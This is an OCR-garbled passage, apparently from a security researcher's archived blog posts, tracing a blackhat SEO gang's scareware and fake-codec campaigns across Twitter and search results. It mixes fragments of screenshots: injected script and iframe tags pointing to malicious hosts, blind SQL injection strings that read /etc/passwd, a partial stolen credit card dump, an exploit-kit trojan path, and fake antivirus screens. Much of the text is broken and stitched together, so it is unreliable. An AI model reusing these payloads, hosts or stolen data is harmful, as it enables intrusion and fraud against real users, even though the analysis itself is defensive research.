www. dd-photo. net/hongdae/board/?doc=bbs/gblink. php&.bo_table=board&sselect=é&stext=2 
ssort=w... - 29k - Cached - Similar pages - Note this 

More results from www. dd-photo. net » 


BURT REYNOLDS NUDE MALE CENTERFOLD <iframe src=//gpamelaaandersona ... 
We were unable to find anything for BURT REYNOLDS NUDE MALE CENTERFOLD <iframe 


src=//gpamelaaandersona.info/-naked.html>.html’. Please try another search. ... 
www. partykorea. or. kr/?doc=bbs/gblink. phpé&bo_table=freeboard&wr_id=1787 &index=2 - 29k - 
Cached - Similar pages - Note this 
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It gets even more inter-connected and malicious since this very same gang is also the one 
responsible for the ongoing [13]malware campaign spreading scareware by using Twitter’s 
trending topics. Let’s establish a direct connection between the Ukrainian gang and the 


campaign. 


The TinyURL links used redirect to an identical domain - OOfreewebhost .cn - 211.95.79.115 
- Email: louisgreenfield@gmail.com, where an iFrame is loading happy-tube-video 
.com/xplays.php?id=40030 - 216.240.143.7 - Email: isaacdonn@gmail.com where 
[14]Mal/FakeAV-AY (streamviewer.40030.exe) is served, this time from  exe-soft-files 
.com/streamviewer.40030.exe - 66.197.171.6 - Email: michalevd@gmail.com. 
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Consulting Services<script src=http://17gamo.coml1 js></script= 


Consulting Services. For your next power improvement project, would you rather have 
cost-justification up front or guaranteed results at the end? Or both? ... 
www. Cooperpowersystems. biz/services/consulting/ - 16k - Cached - Similar pages - 


Cartoonsscript src=http://17 gamo.coml/1 js></script= Wallpapers ... 


This site may harm your computer. 
Download Free Hollywood, Bollywood, Lollywood & Natural Mobile VVallpapers fram 


Pakistanway.com. 
mobiles. pakistanway.com/Free_VV¥allPapers.aspx?catid=34 - Similar pages - 


Lifeline<script src=http://17 gamo.com/1 js></script=<script src ... 

To place an order, please contact us lifeline@netvision.net.il. Please note that prices may 
have increased due to the lowered exhange rate of U.S. Dollars ... 

www. lifeline. org. il/shop/front/Category.asp?DisplayMode=&CategoryContain=1 & 

UID=%? BCFISDA4E-92C... - 53k - Cached - Similar pages - 


ALM Professional Services LLC<script src=http://17gamo.com/1 js ... 
Government Codes. NAICS: 541512, NAICS: 541513, NAICS: 541519, NAICS: 541611. PSC: 
R407, PSC: R408, PSC: R409, PSC: R421, PSC: R499 SIC: 7376, SIC: 7379... 
yetbiznetwork. poclink.com/company/CompanyPrint.asp?Companyld=1 1994 - 6k - 

Cached - Similar pages - 


Pieces (of Ass)<script src=http://17gamo.com/1 js></script= 


Discount offers and special deals from Las Vegas Businesses. Tickets ta shows in and arour 
Las Vegas including hotel rooms and casino bookings, ... 
www.vegasbestbuy.com/?binx=1656 - 7k - Cached - Similar pages - 


Rock Climbing and Bouldering - Squamish<script src=http:/17gamo ... 
This site may harm your computer. 

30 Apr 2005 ... Rock Climbing and Bouldering Squamish - Squamish - British Columbia. 
www. getbeta.com/rock_climbing_locations.asp?locID=5371 - Similar pages - 


Millennium Data Solutions, Corp.<script src=http://17gamo.com/1 js ... 


Millennium Data Solutions, Corp. web hosting company. 
www. hostchart.com/comnany details.asn?ID=2485 - 33k - Cached - Similar nages - 
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= Microsoft SQL Database Extractor ** Coded by dan83 for unknOwn.eu 


C, eden 3161 SW 133 AVE 
ESS: 66.176 250.183 
R_DATE: Oct 4 2007 12.004M 


10; 1030326839 
CCNUMBER: 371 SIM o04 
CCEXP: 02/08 


company. B-READY INC 

access: 19705 ONE NORMAN BLYD 
COLUM ESS: 65.92 246.178 
CONSTRAINT_COLUMN_USAGE SHIP_COMPANY IDER_DATE: Oct 1 2007 12004M 
CONSTRAINT_TABLE_USAGE 


all 
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ITS "SOL & X59 Error finder..... by ComSec 


tp: / www, google. ®/ 


String Creator 
Search URL for Input 


SOL Forradat 


iGoogle | Accesso 


immagini Gruppi 
Ricerca svenzaia 
Preferenze 
Strumenti per te lingue 


Pubblicita - Soluzioni Aziendali - Tutto su Google - Google com in English 


li l m ina iniziale! 


©2007 Google 
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SqiDumper - www.ictsc.it 


Urk: http: { www. example. com/index. php?id=20QUERY 
Query: ‘INJECTION AND '1' = '1 


Query identifier [query 
Injection Identifier:|INJECTION 


File to dump: fetc/passwd 
Try character: z 
root: x: 


RING(COAD_FILE¢’/ etc/ passwd’),4,1))=110%20AND%20'1'%20=%20'1| 
RING(C_OAD_FILEC¢’/ etc/ passwd’),4,1))=111%20AND%20'1'%20=%20'1 
RING(COAD_FILE¢’/ etc/ passwd’),4,1))=112%20AND%20'1'%20=%20'1 = 


RING(COAD_FILE¢’/ etc/ passwd’),4,1))=113%20AND%20'1'%20=%20'1 
RING@OAD_FILE¢’/ etc/ passwd’),4,1))=114%20AND%20'1'%20=%20'1 
RING(C_OAD_FILEC¢’/ etc/ passwad’),4,1))=115%20AND%20'1'%20=%20'1 
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| airexs [cours | cowwenr | _WenwavenPavours 


| Date | Raw [Unique | Lead | Sale | TOTAL | Ratio | Visitor| Lead | Sale_ 
[rorar [sas] raeo] sae | 0 | sae |e [40:29 | 077 940.00] g0.00 
2007-03-01) 2411 572 sae | 0: | 18 $163.12 | $0.00] $0.00 


$0.00 
0.00 


$4977.94 
$163.12 
2007-03-02 


$0.00 $119.44 


2001 Tas fea2 [$022 | s10.a 
2615 | 750 | 16 | o | 16 | 2.13] $0.20 | $146.62 
wsia | ooo [=| 0 | 2 [20a] soos] sorzas [oo 
3901 | a0s2 | 28 | 0 | 25 |2ae|$n22| $2090 
ara [xzi9 | 27 | 0 | 27 [20s |t020] 
soos [s2ea | 27 | 0 | a7 [20a] soa7| sansa 
saia | eos [ax | 0 | at [227] soas| sisas [oo 
szea | ova | 0 | 0 | 20 [42s] oa0| s205a9 [40 


2007-03-03 


+h 
o 
o 
o 
anal 


$146.62 
$312.19 
$233.06 


2007-03-04 


o 
Oo 
o 


0.00 


oO 
Sas 
o 
Oo 


=) |= 


2007-03-05 0.00 


2007-03-06 0.00 
$0.00 
$0.00 
$0.00 
$0.00 


0,00 


Sa 
o 


Sas 
o he 
o 

o 


2007-03-07 $346.69 
$185.44 
$345.19 
$317.06 
$260.25 
$146.62 
$177.19 


$127.69 


2007-03-08 
2007-03-09 


Sad 

[=| 
an) 
=] |=) 


2007-03-10 


Pose [oe [0 | o [esr] x00 | 42170 


oS jee 


na [26 | 0 | 2 [393] e097 
573 16 fo | 16 | 2.79 | $0.26 
20 a" | 20. | 3.38 | $0.30 
Po [ae [ear 
Eka 1.67 | $0.14 74.25 | $0, 0,00 $74.25 

2007-03-16 | 4817 | 1283 eae? | ie: || ee [ames $287.44 | $0.00) $0.00 | $287.44 

2007-02-17] os [aass | sa | 0 | v2 [ar |en.as| seaeae |s0.00| 40.00 | senaaa | 
faaar-oa-ae| asa [soos [aa [ 0 | «2 [27 [40.20] 0a.0s |s0.00| 4.00 | wc | 
2aer-oa-as| avea | rar [20 | 0 | 20 [200] 40.25] s2s0.2s |s0.00| 4.00 | szcoas | 


2007-03-11 | 2639 $260.25 
$146.62 
$177.19 


$127.69 | $0, 


$ 


(aa | 
ao) Oo o 
Oo 


2007-03-12 | 2273 0.00 


Sad 
Sas 


So ies 


2007-03-13 | 2214 
2462 


2447 


591 
591 


aan 
Oo 
Oo 


0,00 
$0.00 


2007-03-14 


o 
Oo 
o 


2007-03-15 


Sad 


Oo 
Oo 
aad 


rs 


o 
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Glass cullet - Krylon frosted glass paies - What is a wrapper class is c++ - Glass tiggers - Bloegrass creeping - Harmony centred bass amps - Asked bass frequently theory - St theenass hospaal 
Class site take web 


Rumbass nightclub 


Melt glass how to boetle ast fla 

© Mose mass im ev 

© lesported glass boates 

© Bhecsrass praive 

© [aground Sherglass swimming pool manuincturers , ass coming 

¢ Business class europe frst travel 

© Cay dollar is saver i pass hostel . pyrex glass adult sex 
© Glows blowing lathe 

o Ramey pass repak seattle 

«© Bypass gastrico . Siding glass door leaks , Rumbass nightclub . Disney photo 
pass peomoton code , Business class europe fest travel 

© Travel cheap frst class axfares lagos 


« Disney photo pass promotion code . Rumbass nightchi . Online spanish class 


thee . lag grid » Ge gees syacbome “Important message! Stop her!" Then be dropped his chin on his chest and slept. When half a dozen menstarted to carry him 
© Buikine ctena class mamfactures wholesaler up the gang-plank, he mwoke, reached foe the grip and ching to # Ee a drowning man On deck he business class cerepe 


» Bhsegrass creeping , Rumbass nightclub , Siding glass door leaks , Business “tl w . 
class ewope frst travel, Melt ghass how to bottle art fat farst travel became a centre of horror and curiosity. The clothing muwhich he had left White Horse was represented by a few 


o Class site take web 
© Ther 4 


© Ass big kerry romd & 


tags, and he wasas frayed as his clothing Hamemerticid and Dr, Balingford being that thelamer has made the God of the 
Olgarchs a ttle more gaseous and alittle bess vertebrate. “Peter Doanclly. the scab foreman at the Sierra Mis whom 1 
encousreredwhile iewestigating the case of Jackson, was a surprise buntness class europe first ravel to a8 of us 1019181] 
was present at a meeting of the Frisco Reds. 


+ Bypass gastico Let's see: that'stwo hundred whole hours. Suppose | save two hundred how's a year foethousands of other besiness class 
oe europe farst travel folks_--that's farming some, ain't KX” Dede could only nod breathlessly. She had caught the contagion of 
Sliding glass door leaks hisenthusiasm, though she had no clew as to how this great time-saving waito be acccenpkshed | caught hold of the stick 


with ory business class eerope first travel hands, but such washis strength that he jerked me into the crevice. He reached 
Siding glass door lealcs , Golds gym class schedule . Harmony central bass amps , for me withhis loag arm, and his nals tore any flesh as | leaped back from thechutch and gained the comparative safety of the 


Ass big kerry round tt side-wall He began poking again, and caught me a painful blow on the shoulder 
© Compass partmers new york . class ectioe suit mgmnst ets praxis test , hos angeles 
mass tant 


 Weeld class vacations , Ass big kerry round tk , Asked bass frequestly theoey 
© Rumbass mightchib , Golds gym class schedule , Melt glass how to bottle art flat 
© Bass cuthet adelaide 

@ Greener grass syndrome 

© Hot ass bitch site ax coms , couch class aifaees low cost airline Bekets 


© Glass metal seats 

e St thomass hospaal 
o Rumbass mighechsb 
© Class tener celine . bass double dw pacttic 

© Cane glass hanging insperational lap stained . sun Sherpinss poot 

© Golds grim class schedule 

« Business business class class fight , Compass banks im arizona , Acro glass 
screenshots 

© Murano ginss diemerware 

é - 

« Greener grass syndrome 


This very same domain (happy-tube-video .com registered to isaacdonn@gmail.com) is part of 
the second PornTube fake codec campaign which | assessed above, this time pushed through 
the gang’s blackhat SEO campaigns. 


Moreover, in a typical cybercrime-friendly style, the main malicious domain operated by 
the gang and used in the Twitter campaign - OO0freewebhost .cn - continues to load the 
malware serving domain despite that it’s main index is serving a [15]fake account suspended 
notice - "This Account Has Been Suspended, This includes, but is not limited to overusing 
server resources, publishing adult content, or unauthorized posting of copyrighted material. 
Please contact our Support Team for more information." Which is pretty amusing, since despite 
the fact that they’re using an iFrame to point to a different location, they’ve left an animated 
GIF image of a fake codec hosted there - OOfreewebhost .cn/shmo/pl.gif. 


2329 


[1170] 


23263 


Statistics 
Date [Bots onine [New bots [Searches [ckks [Promt [Sales 


2195| 210610 324.44 
see) tenes) ope) ae ce en ites) | Sot 
ome | — le | ee |e tec] — |e 
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Statistics 


bate [ots one [new ats [snares [ciate [mrt [soos [Referva [Total 


2008-04-25 37005 1388 220203 | 32980) 247.76} 231.00 | o.00 | 478.76 
2008-04-26 49674 1339 209021} 31741) 228.51} 168.00 | o.00 | 396,51 
2008-04-27 92120 1528 209315} 32667] 240.13} 105.00 | a.00 | 345,13 


2008-04-28 38217 1924 240335} 38509] 285.49} 315.00 | a.00 | 600.49 


2008-04-29 38123 1878 225218 | 37330] 281.19} 189.00 | a0) 470,19 
2008-04-30 95451 2270 217815} 37013) 255.21} 231.00 | 0.00 | 486.21 
865073 26962) 3553797 | 549162 | 3989.02 | 3087.00 | o.00 | 7076.02 


[1172] 
Statistics 
Lite Stats: hitpc/idoorway-master.compwap statistics. php ?codesf4tdcabad2chb03c b6b24 3208 7b7F NEWT 
domsins [All Domains By] marks [All Marks > 
Bots Searches Clicks 
ay Google Yahoo MSN Other Google Yahoo MSN Other = ~T iv 
avy avY avY AY AY AY AY AY av ay 

Total: 179 42 3 62 65983 41 67 5040 71101 6964 2232 169 603.8187 
2008-07-29 9 2 ° 9 1 2 1 1s 1002 [by Countries) 76 6 Li) 5.8487 
2008-07-28 4 + ° 2 1787 2 4 116 1879 [by Countries) 169 6s o 19.6158 
2008-07-27 i ts] ° i 1124 1 1 310 1436 [by Countries) 176 i 0 1617 
2008-07-26 4 0 o 0 S34 0 o 262 796 [by Countries) 9 45 1 8.9235 
2008-07-25 5s ts] ° 4 m1 i] ° 16 727 [by Countries) s 47 3 5.7715 
2008-07-24 6 0 ° 2 3 1 o 60 100 [by Countries) 9 0 0 0 
2008-07-23 6 9 ° 9 S2s2 7 2 mE $627 [by Countries) 448 47 ro] 29.2372 
2008-07-22 9 3 o i 20045 8 0 609 20862 [by Countries) 1417 499 2 188.0996 
2008-07-21 6 6 o i) 80S4 3 3 179 8239 [by Countries) 603 267 s 68.4966 
2008-07-20 2 0 0 0 642 0 0 22 664 [by Countries) 106 42 1 6.9297 
2008-07-19 2 ts) ° 0 89s 1 1 19 916 [by Countries] se | 1 9.9122 
2008-07-18 2 0 ° 9 1163 0 1 4 1228 [by Countries) 122 65 2 13,5937 
2008-07-17 8 ts] o 0 3107 0 4 149 3260 [by Countries] 306 169 9 46.9996 
2008-07-16 6 0 1 i 3292 1 0 743 4036 [by Countries) 474 Ss % 68.1835 
2008-07-15 6 ts] ° 0 972 tf] 0 & 1054 [by Countries) 191 ad 6 18.9944 
2008-07-14 s ts] 9 0 “6 LF] o 7 82 [by Countries] “4 6 1 1.2362 
2008-07-13 4 0 ° 0 201 0 i) 13 334 [by Countries) 48 6 1 0.4203 
2008-07-12 8 2 ° 9 347 t:) 0 23 870 [by Countries) 9 76 Bt 4.772 
2008-07-11 6 2 ° 0 263 1 0 9 273 [by Countries) 113 3 3 2.2547 
2008-07-10 4 21 ° i] 427 tt] 9 2 447 [by Countries] 78 40 2 2.8989 
2008-07-09 6 0 ° 0 224 tt] 0 110 334 [by Countries) 72 | 6 4.0209 
2008-07-08 2 0 ° 2 195 tt) 0 177 372 [by Countries) 7 23 2 1.5383 
2008-07-07 6 tf] ° 4 8 4 0 iss 167 [by Countries) 3s 2 1 0.2979 
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Summary for 
This month, top ‘Raw hits’ = 21 


010203040506070809 10 11121314151617 18192021 222324252027 28293031 


Date a Ureques 

total 133335 102252 (76.7%) 
anogme2sis 4 3 (75.0%) 
anogo2s10 8 4(30.0%) 
200ge209 5 4 (80.0%) 
2ooao2me 6 5 (83.3%) 
2n0ga2/07 10 7 (70.0%) 
2noameme 4 2 (30.0%) 
200go2/05 10 7 (70.0%) 
annames 21 3 (14.3%) 
2n0ge2/03 4 2 (50.0%) 
2ooaieem2 6 6 (100.0%) 
2oceo2/01 a 4 (100.0%) 
anog/o1aL 2 1 (30.0%) 
2008/01/30 9 4 (44.4%) 
2ooso1e9 15 4 (26.7%) 
2o0so128 10 2 (20.0%) 
2nogOe7 8 0 (0%) 
2008126 6 1(16.7%) 
anogmues 12 3 (25.0%) 
2oosoies 13 8 (61.5%) 
2oos/o1e3 22 11 (50.0%) 
2008122 13 6 (46.2%) 
anna. 33 21 (63.6%) 
2008120 31 14 (452%) 
anogmin9 27 15 (55.6%) 
200go1/18 35576 27516 (77.3%) 
pongo? 74558 55327 (74.2%) 
2nogoui6 22918 19273 (84.1%) 


Subdomain 
ayv 


http://pub.freeh.com/param-didd} 
http: //pub. freeh.com/php-base32/ 
http: //pub.freeh.com/eredit-bne} 
http: //pub.freeh. com/find-biz76/ 
http: //pub.freeh.com/constru1S/ 
http:/Jpub. freeh.com/mortgage4r} 
http://pub. freeh.com/debt-car23/ 
http://pub. freeh.com/loan-im7} 
http://pub.freeh.com/finance-10/ 
http: //pub.freeh.com/health-cc9/ 
http://pub.freeh. comilicensed76} 
http://pub. freeh.com/cheap-io36/ 
http://pub.freeh.com/internet91} 
http://pub.freeh.com/risk-man83/ 
http: //pub. freeh.com/game-4F/ 


Trafhe statistxs generated 
(Mon Feb 11 19:30:02 2008, SC 
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Promes 


3074 (2.3%) 
0 (0%) 
2 (25.0%) 
2(40.0%) 
2 (33.3%) 
3 (30.0%) 
0 (0%) 
0 (0%) 
0 (0%) 
1 (25.0%) 
2 (33.3%) 
1 (25.0%) 
0 (0%) 
(0%) 
2 (13.3%) 
0 (0%) 
0 (0%) 
0 (0%) 

1 (8.3%) 
2(15.4%) 
4 (18.2%) 
2(15.4%) 

2 (6.1%) 

1(3.2%) 
3 (11.1%) 

869 (2.4%) 
1853 (2.5%) 
322 (1.4%) 


by SuTRS 
HEME: 


Statistics By Subdomains 


Domains [ All Domains >] Marks [All Marks | 


«e€1]2|3>22 


i 
“<a 


ooooocooocooqo ooo 00 0° 


< 


Bobcbobeeoeoboom 


oooooooooooooee Sf 
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i 
i 


3.4.4 .4.4.4.4. 


< 
> 


oS322ss 


wehout 
rotorer 


1160 (0.9%) 
4 (100.0%) 
8 (100.0%) 
5 (100.0%) 
6 (100.0%) 
10 (100.0%) 
4 (100.0%) 
7 (70.0%) 
21(100.0%) 
4 (100.0%) 
6 (100.0%) 
4 (100.0%) 
2 (100.0%) 
2(22.2%) 
3 (20.0%) 
0 (0%) 
0 (0%) 
0 (0%) 
1 (8.3%) 
1(7.7%) 
2 (9.1%) 
1(7.7%) 
9 (27.3%) 
9 (29.0%) 
4 (14.8%) 
211 (0.6%) 
680 (0.9%) 
156 (0.7%) 


| 


A 
“i 


qaooeoooeocooooooo-o970 9° 


me nroooncoo0cnoeo oer OO 98 CO 


< 


conaoronconenco M2 


i 
| 


SoOeRP SEDO HANN HR NASH 
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See All See Graph Tweet This Daily Tweets Rate 


chart by anCharts com 


timmymartones | Tue, 09 Jun 17:02 


RTs: 0 | Readers: 11 


Emma Watson 


Apple: Angelina Jolie 
0 In Front Of 


0_O 


Pp 

5 

T 
v. 


timmymarnones | Tue, 09 Jun 16:55 


RTs: 0 | Readers: 11 


Selected Date: ing Messages have been Ried (count): 


Total Update Messages: 96 Unique Users RTing: O rs PREV NEXT 
Total Update Messages RT ed: 0 2 02 


Percent Of Update Messages RT ed: 


A second connection between the Ukraininan black SEO gang, Twitter’s ongoing campaign and 
the [16]fake web hosting provider which | profiled yesterday can also be made. 


For instance, the [17]URL shortening service used in last week’s campaign at Twitter 
a.gd/2524d9/ redirects to 66.199.229 .253/etds/go.php?sid=43 and then to av-guard 
-net/?uid=27 &pid=3 as well as to fast-antivirus .com which are the scareware domains 
exposed in the recent "[18]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO 
Campaign at Blogspot" post. The scareware obtained from it, as well as the scareware from 
the above-exposed PornTube campaign streamviewer.40030.exe also share the same phone 
back locations. 


Coming across yet another operation managed by them, namely, the ongoing Twitter 
trending topics hijacking attack, clearly demonstrates the impact this single group of individu- 
als can have while multitasking at different fronts. And despite the numerous traffic acquisition 
tactics used, the monetization approach remains virtually the same - [19]scareware. 


1. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.html 

2. http: //ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. html 

3. http: //blogs.zdnet .com/security/?p=3549 

4. http://www.virustotal.com/analisis/b6be40adcd5157dcfbcf8d33217 9dee6d2f 9afb8c9a23457d4e3034£849b9c10- 12443 
22301 

5. bhttp://www.virustotal.com/analisis/c1033da5d371cff£01c92ebaa9f 3252f e74c4ce9611273747289d803d44688be0- 12444 
45659 

6. http://www.virustotal.com/analisis/69ba169d715bb726dcad878de94fe3d6d956bb9 1 1672d9b48 cbf 4d21d5c7d826- 12445 
81451 

7. http: //ddanchev. blogspot .com/2009/06/diverse-portfolio-of-fake-security.html 

8. http: //ddanchev. blogspot .com/2009/01/diverse-portfolio-of-fake-security.html 

9. http: //ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. html 

10. http: //www.google.com/support/forum/p/Webmasters/thread?tid=67c1f10a8dd9df61&hl=en 

11. http://www.google.com/support/forum/p/Webmasters/thread?tid=4b5cda7d43f 10efb&hl=en 
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@ein Mpsexs Gia Weipsrewe Cepmx Cnpenca 
| Gyoner Ayman B| Me OS K «| EB 


e¢ > @ 
Hess Bnepan Newre Napagerpe: 
MrypMpOB ace marioro 
& Ompoftre pair INDEX HTML » rexcrosom 
pexaxtope 
6b. Haigprre cnegyroupdt Sparen 
var 
Trojan _Path="hitp “/chazalben web aplus net/svchout ¢ 
C. Homerarre s2tazernse mepeacerntola twams ofpasoa, 
wroGei url yratecean Ma peuty mporpanoty a 
coxpanarre Gasor 


BHHMAHHE: xewpxrypxporars sxcmmitr JAVALOADER 
OTArRb ne ne kayo. Eevee BECO OO MON B ren Gaiee 
INDEX HTML, JAVALOADER wosnoier wee neotxe pom 


test_shell_code.exe 
faa) xp_en bird 

“ » xp _ru, here i 
[EG me Bestipsno: 207 0 Bcero: 2 nak 7 legen! frearor 4nanae 


1) mpasias payload bat, mpormscamax wilt x 


2) sarrycxaem payload bat, xotopsrii samiceweeet s marmat 
9@-EN-RU.OxBFF70000, XP-EN-Ox?7F 60000, XP. RUO0x?C300000 
COOTRETeTBYIOLIDE! LE KOM 


3) varrycuaem beta bat, xoropaat mepernscamact mien-mogns 8 ulf-16 
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OY 
SPY HACK T 


wwuSpyGrupeorg 
JP UtMtt WAGES AnD gecus 


h Jackal 


System scan progress ial (x! 


Systeen Tasks 


; s) UJ 
: teed droves elected yo and xe se Filename 
Other Places A ade . 
Pe) ocal Desk @ Local Duk ¥ mess. Trojan 
‘ \v) reerv.Tranmspoeder. Trojan 
| a wo [¥) Wstart. TrojanDewnloader 
=) : “2 
“ *] A . Remove all Carel 
co 
Oetads Seyware is software, which can gather information from user's computer through 
Piternet connection and send them bo &s creator, Gathered information can be 
My ( ommpater Scanning compheted. 527 Potestial aggresseve behavior was found! pasewords, onal addewes and af that data, which 6 mpcrtare for you 
4 
m 
Your Info 
lane Rank lever ate or nincte ate - 
tmad-Worm.Wind2ttet —_Criftical 11. 38.2008 3 tng remo a 
Your private data ts under attack! 
Emad: Worm. Wind2 Myd Crtical : song re 
Trojan-Downloader.Win Critical 31.38.2008 s tng ‘erove = 
y dangerous fr your systen. Trojan-Oownloader steaing namecrds, cre ib and othe 
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maine swine flu - [ Diese Seite iibersetzen ] 
Tell me about maine flu swine!!! Hot news about maine swine flu. 
2qnews.07x.net/maine-swine-flu_html - 14k - lm Cache - Ahnliche Seiten 


swine flu systoms - [ Diese Seite ibersetzen ] 
Tell me about systoms flu swine!!! Hot news about swine flu systoms. 
2qnews.07x.net/swine-flu-systoms-html - 14k - |m Cache - Ahnliche Seiten 


swine flu columbus - [ Diese Seite tbersetzen ] 
Tell me about flu swine columbus!!! Hot news about swine flu columbus. 
2qnews.07x.net/swine-flu-columbus.html - 15k - |m Cache - Ahnliche Seiten 


cleburne swine flu - [ Diese Seite tibersetzen ] 
Tell me about swine flu cleburne!!! Hot news about cleburne swine flu. 
2qnews.07x.net/cleburne-swine-flu_html - 14k - lm Cache - Ahnliche Seiten 


swine flu systems - [ Diese Seite iibersetzen ] 
Tell me about flu systems swine!!! Hot news about swine flu systems. 
2qnews.07x.net/swine-flu-systems_html - 14k - Im Cache - Ahnliche Seiten 


swine flu oklahoma - [ Diese Seite tibersetzen ] 


1 May 2009 ... Tell me about swine flu oklahoma!!! Hot news about swine flu oklahoma. 


2qnews.07x.net/swine-flu-oklahoma.html - 14k - Im Cache - Ahnliche Seiten 


swine flu in virginia - [ Diese Seite ibersetzen ] 
Tell me about virginia in swine flu!!! Hot news about swine flu in virginia. 
2qnews.07x.net/swine-flu-in-virginia_html - 15k - lm Cache - Ahnliche Seiten 


chicago swine flu - [ Diese Seite tbersetzen ] 
Tell me about swine flu chicago!!! Hot news about chicago swine flu. 
2qnews.07x.net/chicago-swine-flu.html - 14k - lm Cache - Ahnliche Seiten 


swine flu orange county - [ Diese Seite tibersetzen ] 


Tell me about county swine orange flu!!! Hot news about swine flu orange county. 
2qnews.07x.net/swine-flu-orange-county.html - 15k - lm Cache - Ahnliche Seiten 


swine flu in Ca - [ Diese Seite tibersetzen ] 


Tell me about in ca swine flu!!! Hot news about swine flu in ca. 
2qnews.07x.net/swine-flu-in-ca_html - 14k - Im Cache - Ahnliche Seiten 
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2008 2007 


Rank Rank 
iL 1 
2 2 
| 9 
4 3 
5 12 
6 4 
7 6 
8 5 
9 17 
10 8 


item 


Credit card Information 
Bank account credentials 
Email accounts 

Email addresses 

Proxies 

Full identities 

Mailers 

Cash out services 


Shell scripts 
Scams 


| 
Percentage | Percentage | Range of Prices 


2008 2007. | 
32% 21% 
19% 17% 

5% 4% 

5% 6% 

4% 3% 

4% 6% 

3% 5% 

3% 5% 

3% 2% | 
3% 5% 


Table 1. Goods and services available for sale on underground economy servers 


Source: Symantec 
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$0.06-$30 
$10-$1000 
$0.10-$100 
$0.33/MB-$100/MB 
$0.16-$20 
$0.70-$60 

$2-$40 


8%-50% or flat rate of 
$200-$2000 per Item 


$2-$20 


$3-$40/week for hosting, 
$2-$20 design 


Taliban Singles Online 


Name: Guenokal 


Occupation: Not Allowed 
Income: Nol Allowed Incom & Not Alowed 
Hobbies Not Allowed Hobbies Not Allowed 


Looting For A Little Sunshine 

Name: Frozan 

Age: 28 

Location: Tert 

Occupation Not Allowed he 

Income: Not Allowed incom & Not Adowed 
Hobkies Not Allowed Hobbies: Not Alo wed 


Income: Not Alowed incom & Not Alowed 
Hobbies Not Allowed Hobbies Not Allowed 


NOMORE BEATINGS, PLEASE 

Nome: Frogn 

Age 31 

Location: Tent 

Occupation Not Allowed ‘hist . 

Income: Nol Allowed incom & Not Mlowed 
Hobbies Not Allowed = Hobbies Not Allowed 


Occupation Not Allowed 
Income: Not Alowed Incom & Not Allowed 
Hobbies Not Allowed Hobbies Not Allowed 


1121314151617 /619 
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TESTLMOMAL 
Osaru says, “Before 
Hound tit ste my 
love weat nite é to the 
tests of tie field, Dut 
row Ihave found 

many women te 
subjegate and brutalize, 
Nive job” 


Income: Not Alowed 
Hobbies Not Allowed 


Occupation: Not Allowed 
Income: Not Allowed 
Hobbies Not Allowed 


Income: Not Allowed 
Hobbies Not Allowed 


Occupation Not Allowed 
Income: Nol Allowed 
Hobbies Not Allowed 


Income: Not Allowed 
Hobbies Not Allowed 


mene Wm Yihere Are You Good Looking 


Nome Gumokal 

Age. 24 

Location: Cave 
Occupation: Not Afoved 
incom & Not Alowed 
Hobbies Not Allowed 


LCAN'T SEE ANYONE HERE 
Name Masoods 

Age 24 

Location: Cave 

Occupation: Not Afoved 
incom & Not Allowed 
Hobbies Not Allowed 


LDecare A Jihad On U Baby 
Name: Shreengul 

Age 29 

Location: Cave 

Occupation: Not Alowed 
incom & Not Mowed 
Hobbies Not Allowed 


Make Me 1 Of Your Wives 
Nome Marboba 

Age 32 

Location: Cave 
Occupation: Not Afoved 
incom & Not lowed 
Hobbies Not Allowed 


@ Not Like Al! The Other Women 


Name Pakhtoon 

Age 26 

Location: Hut 
Occupation: Not Aloved 
incom & Not Allowed 
Hobbies Not Alowed 


1121/3141516171619 


joo-ks.com 


About The Taiban EAQs SteMap Privacy Polinysnotappicable to momen) Email Us 
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12. 
13 

14. 
ie 


16. http: //ddanchev. blogspot .com/2009/06/fake- web-host ing-provider-front-end-to.htm 


17. bttp://www.abuse.ch/?p=149 


18. http: //ddanchev. blogspot .com/2009/06/fake- web-host ing-provider-front-end-to.htm 


19. http://ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 


5.6.8 Iranian Opposition DDoS-es pro-Ahmadinejad Sites (2009-06-16 12:53) 


DoS Attack Pro-Ahmadinejad Websites ... 
eA Se 9d je slg Ay Bs Cog ee pte ig dle 


NSS FU by dado cyl Blog Archive 
Keep this page open! ¥ 2009 (1) 


DOS LIARS 


my complete pro fie 


By utilizing the people’s information warfare concept, Iranian opposition has managed to 
[1]successfully organize a cyber attack against Tehran’s regime (complete analysis) by using 
Twitter, web forums, and localization (translation) of the recruitment messages in order to 
seek assistance from foreigners. 
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 Admess Trojan 
asery, Teamaponder. Trojan 


which can gather formation 
Conmechon and send them te ts crestor, Gathered information 
onde, e-mnal addresses and al that dete, which = important for you. 


Sees es hae Bs kneel cone mae Se Re bee cae 
7 (poterially haem your computer Il pou do mat ust the sovece. do nat 
(not cares thas coftmane What 5 the mh? 


Threats and actors: 

tare Rak eve! ate Hes efectes State - 
@ tot wormwnrznet — Crtkal 13.38.2008 s Wasng remove! J 
@ test wormwetzttyd = Crtkal 13.98, 2008 s Werrg remows 

@ we x20e8-x9 Crna 13.98,2008 3% Werg renee 

Deve nption - 
bia miele wenfenenmeinc on aac a Tropae Downloader siesing pasmeords, edt Conds and oTer | 


Adewe: 
You need to remowe tus Preat a3 s00n as posabie! 
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Connecticut Tax Form 2210 

IRS income tax return forms, IRS 1040 tax form, irs form 1040-A _.. Connecticut Form 1040, 
Individual Resident Income Tax Return. Supported - ... 

connecticut-tax-form-2210. - Similar 


State Of Minnesota Property Tax Form 

19 Jun 2009 ... efile | Minnesota Income Tax | Minnesota State Tax Form Based on the 
Minnesota state tax information you enter the efile tax preparation - ... 
state-of-minnesota-property- - Similar 


Arkansas Form Income Tax 


Arkansas Tax Forms, Refunds, Instructions, IRS Guides Arkansas Individual Income Tax 
Homepage - Downloadable forms with instructions, news releases, ... 
arkansas-form-income-tax. - Similar 


Form Income State Tax Wi 


Wisconsin Tax Forms, Sister States 2006 Individual Income Tax Forms - 2007 Individual 
Income Tax Forms ... If you are filing Wisconsin Form WI-Z with a... 
form-income-state-tax-wi. ‘= Similar 


Form 1040 Tax Booklet 


25 Jul 2009 ... 1040 ez form booklet How to file Federal tax form 1040EZ by hand. ... The 
1040EZ tax forms booklet ( from Post Offices everywhere, ... 
form-1040-tax-booklet- - Similar 


Dc Form State Tax 


